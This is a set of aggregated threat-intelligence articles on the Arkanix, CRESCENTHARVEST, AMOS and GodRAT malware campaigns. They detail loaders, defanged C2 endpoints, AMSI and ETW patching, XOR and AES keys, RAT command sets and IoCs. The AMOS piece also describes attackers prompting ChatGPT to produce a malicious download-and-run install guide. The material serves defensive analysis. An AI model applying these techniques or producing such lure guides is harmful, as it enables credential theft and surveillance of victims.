Introduction In October 2025, we discovered a series of forum posts advertising a previously unknown stealer, dubbed “Arkanix Stealer” by its authors. It operated under a MaaS (malware-as-a-service) model, providing users not only with the implant but also with access to a control panel featuring configurable payloads and statistics. The set of implants included a publicly available browser post-exploitation tool known as ChromElevator, which was delivered by a native C++ version of the stealer. This version featured a wide range of capabilities, from collecting system information to stealing cryptocurrency wallet data. Alongside that, we have also discovered Python implementation of the stealer capable of dynamically modifying its configuration. The Python version was often packed, thus giving the adversary multiple methods for distributing their malware. It is also worth noting that Arkanix was rather a one-shot malicious campaign: at the time of writing this article, the affiliate program appears to be already taken down. Kaspersky products detect this threat as Trojan-PSW.Win64.Coins.*, HEUR:Trojan-PSW.Multi.Disco.gen, Trojan.Python.Agent.*. Technical details Background In October 2025, a series of posts was discovered on various dark web forums, advertising a stealer referred to by its author as “Arkanix Stealer”. These posts detail the features of the stealer and include a link to a Discord server, which serves as the primary communication channel between the author and the users of the stealer. Upon further research utilizing public resources, we identified a set of implants associated with this stealer. Initial infection or spreading The initial infection vector remains unknown. However, based on some of the file names (such as steam_account_checker_pro_v1.py, discord_nitro_checker.py, and TikTokAccountBotter.exe) of the loader scripts we obtained, it can be concluded with high confidence that the initial infection vector involved phishing. Python loader The Python loader is the script responsible for downloading and executing the Python-based version of the Arkanix infostealer. We have observed both plaintext Python scripts and those bundled using PyInstaller or Nuitka, all of which share a common execution vector and are slightly obfuscated. These scripts often serve as decoys, initially appearing to contain legitimate code. Some of them do have useful functionality, and others do nothing apart from loading the stealer. Additionally, we have encountered samples that employ no obfuscation at all, in which the infostealer is launched in a separate thread via Python’s built-in threading module. Upon execution, the loader first installs the required packages — namely, requests, pycryptodome, and psutil — via the pip package manager, utilizing the subprocess module. On Microsoft Windows systems, the loader also installs pywin32. In some of the analyzed samples, this process is carried out twice. Since the loader does not perform any output validation of the module installation command, it proceeds to make a POST request to hxxps://arkanix[.]pw/api/session/create to register the current compromised machine on the panel with a predefined set of parameters even if the installation failed. After that, the stealer makes a GET request to hxxps://arkanix[.]pw/stealer.py and executes the downloaded payload. Python stealer version During our research, we obtained a sample of the Python implementation of the Arkanix stealer, which was downloaded from the endpoint hxxps://arkanix[.]pw/stealer.py by the previous stage. The stealer’s capabilities — or features, as referred to by the author — in this version are configurable, with the default configuration predefined within the script file. To dynamically update the feature list, the stealer makes a GET request to hxxps://arkanix[.]pw/api/features/{payload_id}, indicating that these capabilities can be modified on the panel side. The feature list is identical to the one that was described in the GDATA report. Prior to executing the information retrieval-related functions, the stealer makes a request to hxxps://arkanix[.]pw/upload_dropper.py, saves the response to %TEMP%\upd_{random 8-byte name}.py, and executes it. We do not have access to the contents of this script, which is referred to as the “dropper” by the attackers. During its main information retrieval routine, at the end of each processing stage, the collected information is serialized into JSON format and saved to a predefined path, such as %LOCALAPPDATA\Arkanix_lol\%info_class%.json. In the following, we will provide a more detailed description of the Python version’s data collection features. System info collection Arkanix Stealer is capable of collecting a set of info about the compromised system. This info includes: OS version CPU and GPU info RAM size Screen resolution Keyboard layout Time zone Installed software Antivirus software VPN Information collection is performed using standard shell commands with the exception of the VPN check. The latter is implemented by querying the endpoint hxxps://ipapi[.]co/json/ and verifying whether the associated IP address belongs to a known set of VPNs, proxies, or Tor exit nodes. Browser features This stealer is capable of extracting various types of data from supported browsers (22 in total, ranging from the widely popular Google Chrome to the Tor Browser). The list of supported browsers is hardcoded, and unlike other parameters, it cannot be modified during execution. In addition to a separate Chrome grabber module (which we’ll discuss later), the stealer itself supports the extraction of diverse information, such as: Browser history (URLs, visit count and last visit) Autofill information (email, phone, addresses and payment cards details) Saved passwords Cookies In case of Chromium-based browsers, 0Auth2 data is also extracted All information is decrypted using either the Windows DPAPI or AES, where applicable, and searched for relevant keywords. In the case of browser information collection, the stealer searches exclusively for keywords related to banking (e.g., “revolut”, “stripe”, “bank”) and cryptocurrencies (e.g., “binance”, “metamask”, “wallet”). In addition to this, the stealer is capable of extracting extension data from a hardcoded list of extensions associated with cryptocurrencies. Telegram info collection Telegram data collection begins with terminating the Telegram.exe process using the taskkill command. Subsequently, if the telegram_optimized feature is set to False, the malware zips the entire tdata directory (typically located at %APPDATA%\Roaming\Telegram Desktop\tdata) and transmits it to the attacker. Otherwise, it selectively copies and zips only the subdirectories containing valuable info, such as message log. The generated archive is sent to the endpoint /delivery with the filename tdata_session.zip. Discord capabilities The stealer includes two features connected with Discord: credentials stealing and self-spreading. The first one can be utilized to acquire credentials both from the standard client and custom clients. If the client is Chromium-based, the stealer employs the same data exfiltration mechanism as during browser credentials stealing. The self-spreading feature is configurable (meaning it can be disabled in the config). The stealer acquires the list of user’s friends and channels via the Discord API and sends a message provided by the attacker. This stealer does not support attaching files to such messages. VPN data collection The VPN collector is searching for a set of known VPN software to extract account credentials from the credentials file with a known path that gets parsed with a regular expression. The extraction occurs from the following set of applications: Mullvad VPN NordVPN ExpressVPN ProtonVPN File retrieval File retrieval is performed regardless of the configuration. The script relies on a predefined set of paths associated with the current user (such as Desktop, Download, etc.) and file extensions mainly connected with documents and media. The script also has a predefined list of filenames to exfiltrate. The extracted files are packed into a ZIP archive which is later sent to the C2 asynchronously. An interesting aspect is that the filename list includes several French words, such as “motdepasse” (French for “password”), “banque” (French for “bank”), “secret” (French for “secret”), and “compte” (French for “account”). Other payloads We were able to identify additional modules that are downloaded from the C2 rather than embedded into the stealer script; however, we weren’t able to obtain them. These modules can be described by the following table, with the “Details” column referring to the information that could be extracted from the main stealer code. The Wallet patcher and Extra collector scripts are received in an encrypted form from the C2 server. To decrypt them, the attackers utilize the AES-GCM algorithm in conjunction with PBKDF2 (HMAC and SHA256). After decryption, the additional payload has its template placeholders replaced and is stored under a partially randomized name within a temporary folder. Once all operations are completed, the stealer removes itself from the drive, along with the artifacts folder (Arkanix_lol in this case). Native version of stealer During our analysis, we were able to obtain both the release and debug versions of the native implementation, as both were uploaded to publicly available resources. The following are the key differences between the two: The release version employs VMProtect, but does not utilize code virtualization. The debug version communicates with a Discord bot for command and control (C2), whereas the release version uses the previously mentioned C2 domain arkanix[.]pw . The debug version includes extensive logging, presumably for the authors’ debugging purposes. Notably, the native implementation explicitly references the name of the stealer in the VersionInfo resources. This naming convention is consistent across both the debug version and certain samples containing the release version of the implant. After launching, the stealer implements a series of analysis countermeasures to verify that the application is not being executed within a sandboxed environment or run under a debugger. Following these checks, the sample patches AmsiScanBuffer and EtwEventWrite to prevent the triggering of any unwanted events by the system. Once the preliminary checks are completed, the sample proceeds to gather information about the system. The list of capabilities is hardcoded and cannot be modified from the server side, in contrast to the Python version. What is more, the feature list is quite similar to the Python version except a few ones. RDP connections The stealer is capable of collecting information about known RDP connections that the compromised user has. To achieve this, it searches for .rdp files in %USERPROFILE%\Documents and extracts the full server address, password, username and server port. Gaming files The stealer also targets gamers and is capable to steal credentials from the popular gaming platform clients, including: Steam Epic Games Launcher net Riot Origin Unreal Engine Ubisoft Connect GOG Screenshots The native version, unlike its Python counterpart, is capable of capturing screenshots for each monitor via capCreateCaptureWindowA WinAPI. In conclusion, this sample communicates with the C2 server through the same endpoints as the Python version. However, in this instance, all data is encrypted using the same AES-GCM + PBKDF2 (HMAC and SHA256) scheme as partially employed in the Python variant. In some observed samples, the key used was arkanix_secret_key_v20_2024. Alongside that, the C++ sample explicitly sets the User-Agent to ArkanixStealer/1.0. Post-exploitation browser data extractor This is an implant embedded within the resources of the C++ implementation. The author incorporated it into the resource section without applying any obfuscation or encryption. Subsequently, the stealer extracts the payload to a temporary folder with a randomly generated name composed of hexadecimal digits (0-9 and A-F) and executes it using the CreateProcess WinAPI. The payload itself is the unaltered publicly available project known as “ChromElevator”. To summarize, this tool consists of two components: an injector and the main payload. The injector initializes a direct syscall engine, spawns a suspended target browser process, and injects the decrypted code into it via Nt syscalls. The injected payload then decrypts the browser master key and exfiltrates data such as cookies, login information, web data, and so on. Infrastructure During the Arkanix campaign, two domains used in the attacks were identified. Although these domains were routed through Cloudflare, a real IP address was successfully discovered for one of them, namely, arkanix[.]pw. For the second one we only obtained a Cloudflare IP address. Both servers were also utilized to host the stealer panel, which allows attackers to monitor their victims. The contents of the panel are secured behind a sign-in page. Closer to the end of our research, the panel was seemingly taken down with no message or notice. Stealer promotion During the research of this campaign, we noticed that the forum posts advertising the stealer contained a link leading to a Discord server dubbed “Arkanix” by the authors. The server posed as a forum where authors posted various content and clients could ask various questions regarding this malicious software. While users mainly thank and ask about when the feature promised by the authors will be released and added into the stealer, the content made by the authors is broader. The adversary builds up the communication with potential buyers using the same marketing and communication methods real companies employ. To begin with, they warm up the audience by posting surveys about whether they should implement specific features, such as Discord injection and binding with a legitimate application (sic!). Additionally, the author promised to release a crypter as a side project in four to six weeks, at the end of October. As of now, the stealer seems to have been taken down without any notice while the crypter was never released. Furthermore, the Arkanix Stealer authors decided to implement a referral program to attract new customers. Referrers were promised an additional free hour to their premium license, while invited customers received seven days of free “premium” trial use. As stated in forum posts, the premium plan included the following features: C++ native stealer Exodus and Atomic cryptocurrency wallets injection Increased payload generation, up to 10 payloads Priority support Speaking of technical details, based on the screenshot of the Visual Studio stealer project that was sent to the Discord server, we can conclude that the author is German-speaking. This same screenshot also serves as a probable indicator of AI-assisted development as it shares the common patterns of such assistants, e.g. the presence of the utils.cpp file. What provides even more confidence is the overall code structure, the presence of comments and extensive debugging log output. Conclusions Information stealers have always posed as a serious threat to users’ data. Arkanix is no exception as it targets a wide range of users, from those interested in cryptocurrencies and gaming to those using online banking. It collects a vast amount of information including highly sensitive personal data. While being quite functional, it contains probable traces of LLM-assisted development which suggests that such assistance might have drastically reduced development time and costs. Hence it follows that this campaign tends to be more of a one-shot campaign for quick financial gains rather than a long-running infection. The panel and the Discord chat were taken down around December 2025, leaving no message or traces of further development or a resurgence. In addition, the developers behind the Arkanix Stealer decided to address the public, implementing a forum where they posted development insights, conducted surveys and even ran a referral program where you could get bonuses for “bringing a friend”. This behavior makes Arkanix more of a public software product than a shady stealer. Indicators of Compromise Additional IoCs are available to customers of our Threat Intelligence Reporting service. For more details, contact us at [email protected]. Domains and IPs arkanix[.]pw arkanix[.]ru
securelist.comFeb 19, 2026extracted
CRESCENTHARVEST Campaign Targets Iran Protest Supporters With RAT Malware
Cybersecurity researchers have disclosed details of a new campaign dubbed CRESCENTHARVEST, likely targeting supporters of Iran's ongoing protests to conduct information theft and long-term espionage. The Acronis Threat Research Unit (TRU) said it observed the activity after January 9, with the attacks designed to deliver a malicious payload that serves as a remote access trojan (RAT) and information stealer to execute commands, log keystrokes, and exfiltrate sensitive data. It's currently not known if any of the attacks were successful. "The campaign exploits recent geopolitical developments to lure victims into opening malicious .LNK files disguised as protest-related images or videos," researchers Subhajeet Singha, Eliad Kimhy, and Darrel Virtusio said in a report published this week. "These files are bundled with authentic media and a Farsi-language report providing updates from 'the rebellious cities of Iran.' This pro- protest framing appears to be intended to increase credibility and to attract Farsi-speaking Iranians seeking protest-related information." CRESCENTHARVEST, although unattributed, is believed to be the work of an Iran-aligned threat group. The discovery makes it the second such campaign identified as going after specific individuals in the aftermath of the nationwide protests in Iran that began towards the end of 2025. Last month, French cybersecurity company HarfangLab detailed a threat cluster dubbed RedKitten that targeted non-governmental organizations and individuals involved in documenting recent human rights abuses in Iran with an aim to infect them with a custom backdoor known as SloppyMIO. According to Acronis, the exact initial access vector used to distribute the malware is not known. However, it's suspected that the threat actors are relying on spear-phishing or "protracted social engineering efforts" in which the operators build rapport with the victims over time before sending the malicious payloads. It's worth noting that Iranian hacking groups like Charming Kitten and Tortoiseshell have a storied history of engaging in sophisticated social-engineered attacks that involve approaching prospective targets under fake personas and cultivating a relationship with them, in some cases even stretching for years, before weaponizing the trust to infect them with malware. "The use of Farsi language content for social engineering and the distributed files depicting the protests in heroic terms suggest an intent to attract Farsi-speaking individuals of Iranian origin, who are in support of the ongoing protests," the Swiss-based security company noted. The starting point of the attack chain is a malicious RAR archive that claims to contain information related to the Iranian protests, including various images and videos, along with two Windows shortcut (LNK) files that masquerade as an image or a video file by using the double extension trick (*.jpg.lnk or *.mp4.lnk). The deceptive file, once launched, contains PowerShell code to retrieve another ZIP archive, while simultaneously opening a harmless image or video, tricking the victim into thinking that they have interacted with a benign file. Present within the ZIP archive is a legitimate Google-signed binary ("software_reporter_tool.exe") shipped as part of Chrome's cleanup utility and several DLL files, including two rogue libraries that are sideloaded by the executable to realize the threat actor's objectives - urtcbased140d_d.dll, a C++ implant that extracts and decrypts Chrome's app-bound encryption keys through COM interfaces. It shares overlaps with an open-source project known as ChromElevator. version.dll (aka CRESCENTHARVEST), a remote access tool that lists installed antivirus products and security tools, enumerates local user accounts on the device, loads DLLs, harvests system metadata, browser credentials, Telegram desktop account data, and keystrokes. CRESCENTHARVEST employs Windows Win HTTP APIs to communicate with its command-and-control (C2) server ("servicelog-information[.]com"), allowing it to blend in with regular traffic. Some of the supported commands are listed below - Anti, to run anti-analysis checks His, to steal browser history Dir, to list directories Cwd, to get the current working directory Cd, to change directory GetUser, to get user information ps, to run PowerShell commands (not working) KeyLog, to activate keylogger Tel_s, to steal Telegram session data Cook, to steal browser cookies Info, to steal system information F_log, to steal browser credentials Upload, to upload files shell, to run shell commands "The CRESCENTHARVEST campaign represents the latest chapter in a decade-long pattern of suspected nation-state cyber espionage operations targeting journalists, activists, researchers, and diaspora communities globally," Acronis said. "Much of what we observed in CRESCENTHARVEST reflects well-established tradecraft: LNK-based initial access, DLL side-loading through signed binaries, credential harvesting and social engineering aligned to current events." The disclosure comes days after The New York Times revealed that Iran's government likely tracked protesters' locations through their phones to warn them over a text message that their "presence at illegal gatherings" had been recorded and that they were under "intelligence monitoring." The move, it said, was an attempt to crack down dissent. According to a report published by Iran-focused digital rights group Holistic Resilience last week, some people who posted on social media about the protests and other political topics have had their SIM cards suspended. "The Islamic Republic is building a distinct model of digital control and surveillance, one that is not based on permanent isolation but on conditional and interruptible connectivity," RaazNet said. "The central pillar of this model is the National Information Network (NIN). Unlike traditional physical infrastructure, such as roads or factories, the NIN is not a static state project. Like other digital systems, it evolves continuously alongside advances in communications technologies, undergoes regular versioning, and is expanded in response to changing technical and political requirements." The move is part of a broader effort that combines information gleaned from e-government databases, surveillance cameras, as well as malware deployed via social engineering to establish remote access and monitor its citizens' movements online in a sustained manner. One such tool is a lightweight modular trojan called 2Ac2 RAT that's designed for victim device control and data collection.
thehackernews.comFeb 19, 2026extracted
The AMOS infostealer is piggybacking ChatGPT's chat-sharing feature | Kaspersky official blog
Infostealers — malware that steals passwords, cookies, documents, and/or other valuable data from computers — have become 2025’s fastest-growing cyberthreat. This is a critical problem for all operating systems and all regions. To spread their infection, criminals use every possible trick to use as bait. Unsurprisingly, AI tools have become one of their favorite luring mechanisms this year. In a new campaign discovered by Kaspersky experts, the attackers steer their victims to a website that supposedly contains user guides for installing OpenAI’s new Atlas browser for macOS. What makes the attack so convincing is that the bait link leads to… the official ChatGPT website! But how? The bait-link in search results To attract victims, the malicious actors place paid search ads on Google. If you try to search for “chatgpt atlas”, the very first sponsored link could be a site whose full address isn’t visible in the ad, but is clearly located on the chatgpt.com domain. The page title in the ad listing is also what you’d expect: “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac”. And a user wanting to download the new browser could very well click that link. The Trap Clicking the ad does indeed open chatgpt.com, and the victim sees a brief installation guide for the “Atlas browser”. The careful user will immediately realize this is simply some anonymous visitor’s conversation with ChatGPT, which the author made public using the Share feature. Links to shared chats begin with chatgpt.com/share/. In fact, it’s clearly stated right above the chat: “This is a copy of a conversation between ChatGPT & anonymous”. However, a less careful or just less AI-savvy visitor might take the guide at face value — especially since it’s neatly formatted and published on a trustworthy-looking site. Variants of this technique have been seen before — attackers have abused other services that allow sharing content on their own domains: malicious documents in Dropbox, phishing in Google Docs, malware in unpublished comments on GitHub and GitLab, crypto traps in Google Forms, and more. And now you can also share a chat with an AI assistant, and the link to it will lead to the chatbot’s official website. Notably, the malicious actors used prompt engineering to get ChatGPT to produce the exact guide they needed, and were then able to clean up their preceding dialog to avoid raising suspicion. The infection To install the “Atlas browser”, users are instructed to copy a single line of code from the chat, open Terminal on their Macs, paste and execute the command, and then grant all required permissions. The specified command essentially downloads a malicious script from a suspicious server, atlas-extension{.}com, and immediately runs it on the computer. We’re dealing with a variation of the ClickFix attack. Typically, scammers suggest “recipes” like these for passing CAPTCHA, but here we have steps to install a browser. The core trick, however, is the same: the user is prompted to manually run a shell command that downloads and executes code from an external source. Many already know not to run files downloaded from shady sources, but this doesn’t look like launching a file. When run, the script asks the user for their system password and checks if the combination of “current username + password” is valid for running system commands. If the entered data is incorrect, the prompt repeats indefinitely. If the user enters the correct password, the script downloads the malware and uses the provided credentials to install and launch it. The infostealer and the backdoor If the user falls for the ruse, a common infostealer known as AMOS (Atomic macOS Stealer) will launch on their computer. AMOS is capable of collecting a wide range of potentially valuable data: passwords, cookies, and other information from Chrome, Firefox, and other browser profiles; data from crypto wallets like Electrum, Coinomi, and Exodus; and information from applications like Telegram Desktop and OpenVPN Connect. Additionally, AMOS steals files with extensions TXT, PDF, and DOCX from the Desktop, Documents, and Downloads folders, as well as files from the Notes application’s media storage folder. The infostealer packages all this data and sends it to the attackers’ server. The cherry on top is that the stealer installs a backdoor, and configures it to launch automatically upon system reboot. The backdoor essentially replicates AMOS’s functionality, while providing the attackers with the capability of remotely controlling the victim’s computer. How to protect yourself from AMOS and other malware in AI chats This wave of new AI tools allows attackers to repackage old tricks and target users who are curious about the new technology but don’t yet have extensive experience interacting with large language models. We’ve already written about a fake chatbot sidebar for browsers and fake DeepSeek and Grok clients. Now the focus has shifted to exploiting the interest in OpenAI Atlas, and this certainly won’t be the last attack of its kind. What should you do to protect your data, your computer, and your money? Use reliable anti-malware protection on all your smartphones, tablets, and computers, including those running macOS. If any website, instant message, document, or chat asks you to run any commands — like pressing Win+R or Command+Space and then launching PowerShell or Terminal — don’t. You’re very likely facing a ClickFix attack. Attackers typically try to draw users in by urging them to fix a “problem” on their computer, neutralize a “virus”, “prove they are not a robot”, or “update their browser or OS now”. However, a more neutral-sounding option like “install this new, trending tool” is also possible. Never follow any guides you didn’t ask for and don’t fully understand. The easiest thing to do is immediately close the website or delete the message with these instructions. But if the task seems important, and you can’t figure out the instructions you’ve just received, consult someone knowledgeable. A second option is to simply paste the suggested commands into a chat with an AI bot, and ask it to explain what the code does and whether it’s dangerous. ChatGPT typically handles this task fairly well. How else do malicious actors use AI for deception?
kaspersky.comDec 9, 2025extracted
GodRAT – New RAT targeting financial institutions
Summary In September 2024, we detected malicious activity targeting financial (trading and brokerage) firms through the distribution of malicious .scr (screen saver) files disguised as financial documents via Skype messenger. The threat actor deployed a newly identified Remote Access Trojan (RAT) named GodRAT, which is based on the Gh0st RAT codebase. To evade detection, the attackers used steganography to embed shellcode within image files. This shellcode downloads GodRAT from a Command-and-Control (C2) server. GodRAT supports additional plugins. Once installed, attackers utilized the FileManager plugin to explore the victim’s systems and deployed browser password stealers to extract credentials. In addition to GodRAT, they also used AsyncRAT as a secondary implant to maintain extended access. GodRAT is very similar to the AwesomePuppet, another Gh0st RAT-based backdoor, which we reported in 2023, both in its code and distribution method. This suggests that it is probably an evolution of AwesomePuppet, which is in turn likely connected to the Winnti APT. As of this blog’s publication, the attack remains active, with the most recent detection observed on August 12, 2025. Below is a timeline of attacks based on detections of GodRAT shellcode injector executables. In addition to malicious .scr (screen saver) files, attackers also used .pif (Program Information File) files masquerading as financial documents. Technical details Malware implants Shellcode loaders We identified the use of two types of shellcode loaders, both of which execute the shellcode by injecting it into their own process. The first embeds the shellcode bytes directly into the loader binary, and the second reads the shellcode from an image file. A GodRAT shellcode injector file named “2024-08-01_2024-12-31Data.scr” (MD5 d09fd377d8566b9d7a5880649a0192b4) is an executable that XOR-decodes embedded shellcode using the following hardcoded key: “OSEDBIU#IUSBDGKJS@SIHUDVNSO*SKJBKSDS#SFDBNXFCB”. A new section is then created in the memory of an executable process, where the decoded shellcode is copied. Then the new section is mapped into the process memory and a thread is spawned to execute the shellcode. Another file, “2024-11-15_23.45.45 .scr” (MD5 e723258b75fee6fbd8095f0a2ae7e53c), serves as a self-extracting executable containing several embedded files as shown in the image below. Among these is “SDL2.dll” (MD5 512778f0de31fcce281d87f00affa4a8), which is a loader. The loader “SDL2.dll” is loaded by the legitimate executable Valve.exe (MD5 d6d6ddf71c2a46b4735c20ec16270ab6). Both the loader and Valve.exe are signed with an expired digital certificate. The certificate details are as follows: Serial Number: 084caf4df499141d404b7199aa2c2131 Issuer Common Name: DigiCert SHA2 Assured ID Code Signing CA Validity: Not Before: Friday, September 25, 2015 at 5:30:00 AM; Not After: Wednesday, October 3, 2018 at 5:30:00 PM Subject: Valve The loader “SDL2.dll” extracts shellcode bytes hidden within an image file “2024-11-15_23.45.45.jpg”. The image file represents some sort of financial details as shown below. The loader allocates memory, copies the extracted shellcode bytes, and spawns a thread to execute it. We’ve also identified similar loaders that extracted shellcode from an image file named “2024-12-10_05.59.18.18.jpg”. One such loader (MD5 58f54b88f2009864db7e7a5d1610d27d) creates a registry load point entry at “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MyStartupApp” that points to the legitimate executable Valve.exe. Shellcode functionality The shellcode begins by searching for the string “godinfo,” which is immediately followed by configuration data that is decoded using the single-byte XOR key 0x63. The decoded configuration contains the following details: C2 IP address, port, and module command line string. The shellcode connects to the C2 server and transmits the string “GETGOD.” The C2 server responds with data representing the next (second) stage of the shellcode. This second-stage shellcode includes bootstrap code, a UPX-packed GodRAT DLL and configuration data. However, after downloading the second-stage shellcode, the first stage shellcode overwrites the configuration data in the second stage with its own configuration data. A new thread is then created to execute the second-stage shellcode. The bootstrap code injects the GodRAT DLL into memory and subsequently invokes the DLL’s entry point and its exported function “run.” The entire next-stage shellcode is passed as an argument to the “run” function. GodRAT The GodRAT DLL has the internal name ONLINE.dll and exports only one method: “run”. It checks the command line parameters and performs the following operations: If the number of command line arguments is one, it copies the command line from the configuration data, which was “C:\Windows\System32\curl.exe” in the analyzed sample. Then it appends the argument “-Puppet” to the command line and creates a new process with the command line “C:\Windows\System32\curl.exe -Puppet”. The parameter “-Puppet” was used in AwesomePuppet RAT in a similar way. If this fails, GodRAT tries to create a process with the hardcoded command “%systemroot%\system2\cmd.exe -Puppet”. If successful, it suspends the process, allocates memory, and writes the shellcode buffer (passed as a parameter to the exported function “run”) to the allocated memory. A thread is then created to execute the shellcode, and the current process exits. This is done to execute GodRAT inside the curl.exe or cmd.exe process. If the number of command line arguments is greater than one, it checks if the second argument is “-Puppet.” If true, it proceeds with the RAT’s functionality; otherwise, it acts as if the number of command line arguments is one, as described in the previous case. The RAT establishes a TCP connection to the C2 server on the port from the configuration blob. It collects the following victim information: OS information, local hostname, malware process name and process ID, user account name associated with malware process, installed antivirus software and whether a capture driver is present. A capture driver is probably needed for capturing pictures, but we haven’t observed such behavior in the analyzed sample. The collected data is zlib (deflate) compressed and then appended with a 15-byte header. Afterward, it is XOR-encoded three times per byte. The final data sent to the C2 server includes a 15-byte header followed by the compressed data blob. The header consists of the following fields: magic bytes (\x74\x78\x20) , total size (compressed data size + header size), decompressed data size, and a fixed DWORD (1 for incoming data and 2 for outgoing data). The data received from the C2 is only XOR-decoded, again three times per byte. This received data includes a 15-byte header followed by the command data. The RAT can perform the following operations based on the received command data: Inject a received plugin DLL into memory and call its exported method “PluginMe”, passing the C2 hostname and port as arguments. It supports different plugins, but we only saw deployment of the FileManager plugin Close the socket and terminate the RAT process Download a file from a provided URL and launch it using the CreateProcessA API, using the default desktop (WinSta0\Default) Open a given URL using the shell command for opening Internet Explorer (e.g. “C:\Program Files\Internet Explorer\iexplore.exe” %1) Same as above but specify the default desktop (WinSta0\Default) Create the file “%AppData%\config.ini”, create a section named “config” inside this file, and, create in that section a key called “NoteName” with the string provided from the C2 as its value GodRAT FileManager plugin The FileManager plugin DLL has the internal name FILE.dll and exports a single method called PluginMe. This plugin gathers the following victim information: details about logical drives (including drive letter, drive type, total bytes, available free bytes, file system name, and volume name), the desktop path of the currently logged-on user, and whether the user is operating under the SYSTEM account. The plugin can perform the following operations based on the commands it receives: List files and folders at a specified location, collecting details like type (file or folder), name, size, and last write time Write data to an existing file at a specified offset Read data from a file at a specified offset Delete a file at a specified path Recursively delete files at a specified path Check for the existence of a specified file. If the file exists, send its size; otherwise, create a file for writing. Create a directory at a specified path Move an existing file or directory, including its children Open a specified application with its window visible using the ShellExecuteA API Open a specified application with its window hidden using the ShellExecuteA API Execute a specified command line with a hidden window using cmd.exe Search for files at a specified location, collecting absolute file paths, sizes, and last write times Stop a file search operation Execute 7zip by writing hard-coded 7zip executable bytes to “%AppData%\7z.exe” (MD5 eb8d53f9276d67afafb393a5b16e7c61) and “%AppData%\7z.dll” (MD5 e055aa2b77890647bdf5878b534fba2c), and then runs “%AppData%\7z.exe” with parameters provided by the C2. The utility is used to unzip dropped files. Second-stage payload The attackers deployed the following second-stage implants using GodRAT’s FileManager plugin: Chrome password stealer The stealer is placed at “%ALLUSERSPROFILE%\google\chrome.exe” (MD5 31385291c01bb25d635d098f91708905). It looks for Chrome database files with login data for accessed websites, including URLs and usernames used for authentication, as well as user passwords. The collected data is saved in the file “google.txt” within the module’s directory. The stealer searches for the following files: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data – an SQLite database with login and stats tables. This can be used to extract URLs and usernames used for authentication. Passwords are encrypted and not visible. %LOCALAPPDATA%\Google\Chrome\User Data\Local State – a file that contains the encryption key needed to decrypt stored passwords. MS Edge password stealer The stealer is placed at “%ALLUSERSPROFILE%\google\msedge.exe” (MD5 cdd5c08b43238c47087a5d914d61c943). The collected data is stored in the file “edge.txt” in the module’s directory. The module attempts to extract passwords using the following database and file: %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data – the “Login Data” SQLite database stores Edge logins in the “logins” table. %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State – this file contains the encryption key used to decrypt saved passwords. AsyncRAT The DLL file (MD5 605f25606bb925d61ccc47f0150db674) is an injector and is placed at “%LOCALAPPDATA%\bugreport\LoggerCollector.dll” or “%ALLUSERSPROFILE%\bugreport\LoggerCollector.dll”. It verifies that the module name matches “bugreport_.exe”. The loader then XOR-decodes embedded shellcode using the key “EG9RUOFIBVODSLFJBXLSVWKJENQWBIVUKDSZADVXBWEADSXZCXBVADZXVZXZXCBWES”. After decoding, it subtracts the second key “IUDSY86BVUIQNOEWSUFHGV87QCI3WEVBRSFUKIHVJQW7E8RBUYCBQO3WEIQWEXCSSA” from each shellcode byte. A new memory section is created, the XOR-decoded shellcode is copied into it, and then the section is mapped into the current process memory. A thread is started to execute the code in this section. The shellcode is used to reflectively inject the C# AsyncRAT binary. Before injection, it patches the AMSI scanning functions (AmsiScanBuffer, AmsiScanString) and the EtwEventWrite function to bypass security checks. AsyncRAT includes an embedded certificate with the following properties: Serial Number: df:2d:51:bf:e8:ec:0c:dc:d9:9a:3e:e8:57:1b:d9 Issuer: CN = marke Validity: Not Before: Sep 4 18:59:09 2024 GMT; Not After: Dec 31 23:59:59 9999 GMT Subject: CN = marke GodRAT client source and builder We discovered the source code for the GodRAT client on a popular online malware scanner. It had been uploaded in July 2024. The file is named “GodRAT V3.5___dll.rar” (MD5 04bf56c6491c5a455efea7dbf94145f1). This archive also includes the GodRAT builder (MD5 5f7087039cb42090003cc9dbb493215e), which allows users to generate either an executable file or a DLL. If an executable is chosen, users can pick a legitimate executable name from a list (svchost.exe, cmd.exe, cscript.exe, curl.exe, wscript.exe, QQMusic.exe and QQScLauncher.exe) to inject the code into. When saving the final payload, the user can choose the file type (.exe, .com, .bat, .scr and .pif). The source code is based on Gh0st RAT, as indicated by the fact that the auto-generated UID in “GodRAT.h” file matches that of “gh0st.h”, which suggests that GodRAT was originally just a renamed version of Gh0st RAT. Conclusions The rare command line parameter “puppet,” along with code similarities to Gh0st RAT and shared artifacts such as the fingerprint header, indicate that GodRAT shares a common origin with AwesomePuppet RAT, which we described in a private report in 2023. This RAT is also based on the Gh0st RAT source code and is likely connected with Winnty APT activities. Based on these findings, we are highly confident that GodRAT is an evolution of AwesomePuppet. There are some differences, however. For example, the C2 packet of GodRAT uses the “direction” field, which was not utilized in AwesomePuppet. Old implant codebases, such as Gh0st RAT, which are nearly two decades old, continue to be used today. These are often customized and rebuilt to target a wide range of victims. These old implants are known to have been used by various threat actors for a long time, and the GodRAT discovery demonstrates that legacy codebases like Gh0st RAT can still maintain a long lifespan in the cybersecurity landscape. Indicator of Compromise File hashes cf7100bbb5ceb587f04a1f42939e24ab d09fd377d8566b9d7a5880649a0192b4 GodRAT Shellcode Injector e723258b75fee6fbd8095f0a2ae7e53c GodRAT Self Extracting Executable a6352b2c4a3e00de9e84295c8d505dad 6c12ec3795b082ec8d5e294e6a5d6d01 bb23d0e061a8535f4cb8c6d724839883 160a80a754fd14679e5a7b5fc4aed672 2750d4d40902d123a80d24f0d0acc454 441b35ee7c366d4644dca741f51eb729 318f5bf9894ac424fd4faf4ba857155e GodRAT Shellcode Injector 512778f0de31fcce281d87f00affa4a8 GodRAT Shellcode Injector 6cad01ca86e8cd5339ff1e8fff4c8558 GodRAT Shellcode Injector 58f54b88f2009864db7e7a5d1610d27d GodRAT Shellcode Injector 64dfcdd8f511f4c71d19f5a58139f2c0 GodRAT FileManager Plugin(n) 8008375eec7550d6d8e0eaf24389cf81 GodRAT 04bf56c6491c5a455efea7dbf94145f1 GodRAT source code 5f7087039cb42090003cc9dbb493215e GodRAT Builder 31385291c01bb25d635d098f91708905 Chrome Password Stealer cdd5c08b43238c47087a5d914d61c943 MSEdge Password Stealer 605f25606bb925d61ccc47f0150db674 Async RAT Injector (n) 961188d6903866496c954f03ecff2a72 Async RAT Injector 